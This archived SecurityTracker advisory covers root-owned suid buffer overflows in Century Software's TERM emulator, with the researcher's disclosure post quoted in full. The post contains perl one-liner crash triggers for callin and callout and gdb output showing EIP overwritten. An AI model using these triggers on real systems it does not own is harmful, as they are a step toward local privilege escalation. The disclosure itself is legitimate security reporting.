SecurityTracker.com Archives - Century Software's TERM Terminal Emulator Software Buffer Overflow Lets Local Users Gain Root Privileges on the System

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Report a Bug

Report a vulnerability that you have found to SecurityTracker -- bugs@securitytracker.com

Questions?

Want to learn about SecurityTracker? We've got answers to frequently asked questions right here

Category: Application (Generic) > TERM for UNIX / Linux

Vendors: Century Software

Century Software's TERM Terminal Emulator Software Buffer Overflow Lets Local Users Gain Root Privileges on the System

Date: Feb 23 2002

Impact: Execution of arbitrary code via local system, Root access via local system

Exploit Included: Yes

Description: A buffer overflow was reported in the TERM terminal emulation product from Century Software. A local user can execute arbitrary code on the system to obtain root privileges on the system.

The software reportedly includes two root-owned set user id (suid) programs: callin and callout. These programs both apparently contain exploitable buffer overflows that allow a local user to execute arbitrary code on the system with root level privileges.

The following commands will reportedly trigger the buffer overflow and overwrite the EIP register:

callin tty`perl -e 'print "B" x 9000'`
callout tty`perl -e 'print "B" x 9000'`

Impact: A local user can execute arbitrary code on the system to obtain root privileges on the system.

Solution: No solution was available at the time of this entry.

Vendor URL: te.censoft.com/products/term_unix.php (Links to External Site)

Cause: Boundary error

Underlying OS: Linux (Any), UNIX (Any)

Reported By: KF <dotslash@snosoft.com>

Message History: None.

Source Message Contents

Date: Fri, 22 Feb 2002 13:16:18 -0500
From: KF <dotslash@snosoft.com>
Subject: Censoft TERM Emu bOf

 

This is a multi-part message in MIME format.
--------------040107030500030506010602
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit



--------------040107030500030506010602
Content-Type: text/plain;
 name="censoft-term.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="censoft-term.txt"

Vendor: www.censoft.com

Product: TERM for UNIX / Linux
Emulations Wyse 60, SCO ANSI, VT220 Terminal
Supports SCO, AIX, HP, DEC, Solaris Operating Environment[tm] software, and Linux[tm] 

I WAS going to purchase this product after trying the eval however I changed my mind for some reason.
..I would Imagine the full
product is also vulnerable

[elguapo@linux elguapo]$ ftp ftp.censoft.com
Connected to ftp.censoft.com.
220 ns.centurysoftware.com FTP server (Version 6.00) ready.
Name (ftp.censoft.com:elguapo): anonymous
331 Guest login ok, send your email address as password.
Password:
230- Welcome To Century Software Ftp Server.
230-
230- Here you will find all the Century Software
230- Products.
230-
...
ftp> cd download/windows/linux
250 CWD command successful.
ftp> get termlx.tar
local: termlx.tar remote: termlx.tar
200 PORT command successful.
150 Opening BINARY mode data connection for 'termlx.tar' (931840 bytes).
226 Transfer complete.

As you can see the .tar file has some suid root stuff to play with
[elguapo@linux elguapo]$ tar tvf termlx.tar
-rwxr-xr-x root/root    630976 2000-04-01 02:00:00 term
-rwsr-xr-x root/root     96988 1999-03-22 23:52:10 callin
-rwsr-xr-x root/root     97144 1999-03-22 23:52:11 callout
-rwxr-xr-x root/root     94484 1999-03-22 23:52:10 brand

Aparantly I don't play nice
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin `perl -e 'print "A" x 9000'`
Arguments must be of form ttyNN
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin tty`perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

rm /etc/LCK..inittab  if you need to try again or you will get the following message
Non-expired lockfile: /etc/LCK..inittab     

Lets check the stack out a bit.
[root@linux /root]# gdb  /home/elguapo/Censoft/callin core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
B'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0xbfffd3a4       -1073753180
edx            0x1      1
ebx            0x805fdf0        134610416
esp            0xbfffd3ec       0xbfffd3ec
ebp            0x42424242       0x42424242
esi            0xbfffd400       -1073753088
edi            0xbfffd858       -1073751976
eip            0x42424242       0x42424242

the callout binary is also affected. 
[root@linux /root]# /home/elguapo/Censoft/callout tty`perl -e 'print "B" x 9000'`
Segmentation fault (core dumped)

[root@linux /root]# gdb  /home/elguapo/Censoft/callout core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
B'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0xbfffd3a4       -1073753180
edx            0x1      1
ebx            0x805fe88        134610568
esp            0xbfffd3ec       0xbfffd3ec
ebp            0x42424242       0x42424242
esi            0xbfffd400       -1073753088
edi            0xbfffd856       -1073751978
eip            0x42424242       0x42424242


-KF

--------------040107030500030506010602--

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2002, SecurityGlobal.net LLC